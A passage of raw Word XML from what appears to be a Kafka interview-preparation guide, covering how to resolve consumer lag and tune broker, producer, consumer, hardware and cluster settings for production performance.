          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure brokers are properly scaled and optimized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6971E3F9"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advanced techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Implement backpressure handling, custom partition assignment, and exactly-once semantics if required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5143B095"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Validate the fix</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitor the system after applying fixes to ensure that consumer lag is resolved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA17E6"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systematically diagnosing the cause of consumer lag and applying the appropriate fixes, you can significantly reduce or eliminate lag, ensuring efficient and timely processing of messages in Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26256B2D" w14:textId="52D7BFC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478" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D6E6D" w14:textId="2FE8902D"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67" w:name="_Toc197868081"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you optimize Kafka performance in a production environment</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="867"/>
    </w:p>
    <w:p w14:paraId="606F3895" w14:textId="46E24DF2" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E"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Optimize Kafka Broker Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9FBDC3"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backbone of a Kafka cluster, and their configuration plays a critical role in performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273FCF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Replication Factor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5617F0F7" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Partitioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F26CBF"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llocation</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure even distribution of partitions across brokers to avoid uneven load distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B54CD9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ing Log Segment Sizes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5F39BA" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Log Retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7434A901"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For topics that require key-based retention (such as when updating state), enable log compaction (log.cleanup.policy=compact).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148ECF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Tune num.io.threads and num.network.threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B45AC0" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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and Network Threads</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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io.threads – Adjust to handle more disk I/O operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA12E46"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network.threads – Increase if Kafka is experiencing high network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78EFE6"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e Kafka Producer Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4098146F"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ducers are responsible for writing data to Kafka topics. The producer's configuration can significantly impact throughput, latency, and resource consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2554C3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Batch Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEC9677" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Buffer Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467B768F" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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c. Enable Compression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147B84F4" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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cks Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD94D6A" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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4269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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higher durability, use acks=all (waits for all replicas to acknowledge).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A18EC5"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Adjust Producer's linger.ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEEDCAD" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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e Kafka Consumer Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6974839C"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data from Kafka, and their configuration can significantly impact message processing speed and lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E9E3CB"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Parallelism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D4C0B4" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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max.poll.records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07221CA3" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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records</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The max.poll.records setting controls how many records a consumer fetches in each poll. If the consumer processes messages quickly, increase this value to improve throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B155AF"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fetch.min.bytes and fetch.max.bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2830E475" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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min.byte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etch.max.bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These settings determine how much data Kafka will send in a single request. Increasing fetch.max.bytes allows the consumer to fetch more data in a single poll, reducing network round trips.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B913B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max.poll.interval.ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35369B64" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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interval.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Optimize Kafka Hardware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510F4DA4"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hardware plays an important role in ensuring high throughput and low latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5322681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Fast Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FF25B2" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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SD Drives</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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RAM and CPU Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9CB828"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mory</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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PU</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers benefit from multiple CPU cores, especially in high-throughput environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F4D9C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Network Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27525007" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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oughput</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that Kafka brokers and producers/consumers have sufficient network throughput, especially in high-throughput scenarios. Network bottlenecks can significantly reduce Kafka performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD4D5A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Kafka Cluster Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F14B7CA"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the Kafka cluster is essential for ensuring reliability and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DB979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d More Brokers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B53B2E8" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Size</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To handle a larger load, scale horizontally by adding more Kafka brokers. This increases the number of partitions and distributes the load, improving performance and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65033E7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ZooKeeper Capacity (if using)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487FCF9E" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that ZooKeeper (if used) is configured and scaled properly. A single ZooKeeper node can become a bottleneck, so consider setting up a quorum of ZooKeeper nodes for reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4CB45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Implement Monitoring and Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAE720D"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key to identifying and resolving performance issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A226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a. Use JMX Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E6C6C6" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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numerous JMX metrics (e.g., throughput, consumer lag, disk usage, etc.) that can be used to monitor Kafka’s health and performance. Use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to monitor these metrics in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A646F5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Log Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1085DE" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Kafka Tiered Storage (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795DEA7B"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For large datasets and to reduce storage costs, consider using </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tiered storage</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (available in newer versions of Kafka) to offload older data to cloud storage systems while keeping active data on local disks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F972C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6B462E7"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479" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50872C5A" w14:textId="7B843FDE" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00543E3B" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="868" w:name="_Toc197868082"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="868"/>
    </w:p>
    <w:p w14:paraId="2F8EC5DE" w14:textId="15B4A00E"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Tuning Broker Configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9337F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heart of the Kafka cluster, and their configuration plays a key role in its performance and reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D5AE2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Partitioning Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17860DD2"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ssignment</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Evenly distribute partitions across brokers to avoid unbalanced loads. Use tools like Kafka's rebalance to ensure an even partition distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A93AE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Replication Factor and In-Sync Replicas (ISR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA7052E"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 ISR</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Configure min.insync.replicas to ensure that producers wait for a certain number of in-sync replicas before acknowledging writes, ensuring data durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC5276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Log Segmentation and Retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29846E89"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 (log.segment.bytes)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Larger log segments reduce the number of file operations required but can increase latency for log compaction. Adjust the log segment size according to your throughput and latency needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58913D62"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and Disk Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BFBCA0"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eads (num.network.threads)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers use network threads to handle requests. Increase the number of network threads if your Kafka brokers are handling high network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B42AAE"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Threads (num.io.threads)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka's I/O threads are responsible for disk reads and writes. Increase these threads to improve disk throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD625E9"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Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use high-performance disks like SSDs for Kafka’s storage. Kafka is heavily reliant on disk I/O, so fast storage is critical for ensuring low latency and high throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4479272C"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Buffering and Memory Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E0A06B"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Heap Size</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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ge Cache</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka uses the OS page cache for data storage, so ensure that brokers have sufficient memory to cache frequently accessed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D98507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ing Producer Configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6752ED3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sends messages to Kafka topics, and its configuration plays a crucial role in throughput and latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7362717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Batching and Compression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A74443"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 (batch.size)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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 (compression.type)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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cks and Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F03BA" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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 (acks)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The acks setting determines the level of acknowledgment the producer requires from the broker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8EE05F"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No acknowledgment, fastest but least reliable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50426245"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 The leader broker acknowledges once it writes the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0CF07"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All brokers in the replication group must acknowledge the write (most reliable). Set acks=1 for a balance between reliability and performance, but use acks=all for higher data durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D310D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Buffer Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2439E505" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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 (buffer.memory)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Linger Time (linger.ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB9365" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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ing Consumer Configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7480A17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messages from Kafka topics, and their configuration directly impacts how quickly and efficiently messages are processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BF7115"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arallelism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C61E91B" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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ax Poll Records (max.poll.records)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B9B2B3" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Records</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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onsumer Fetch Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DA8E60"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in Bytes (fetch.min.bytes)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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ax Bytes (fetch.max.bytes)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
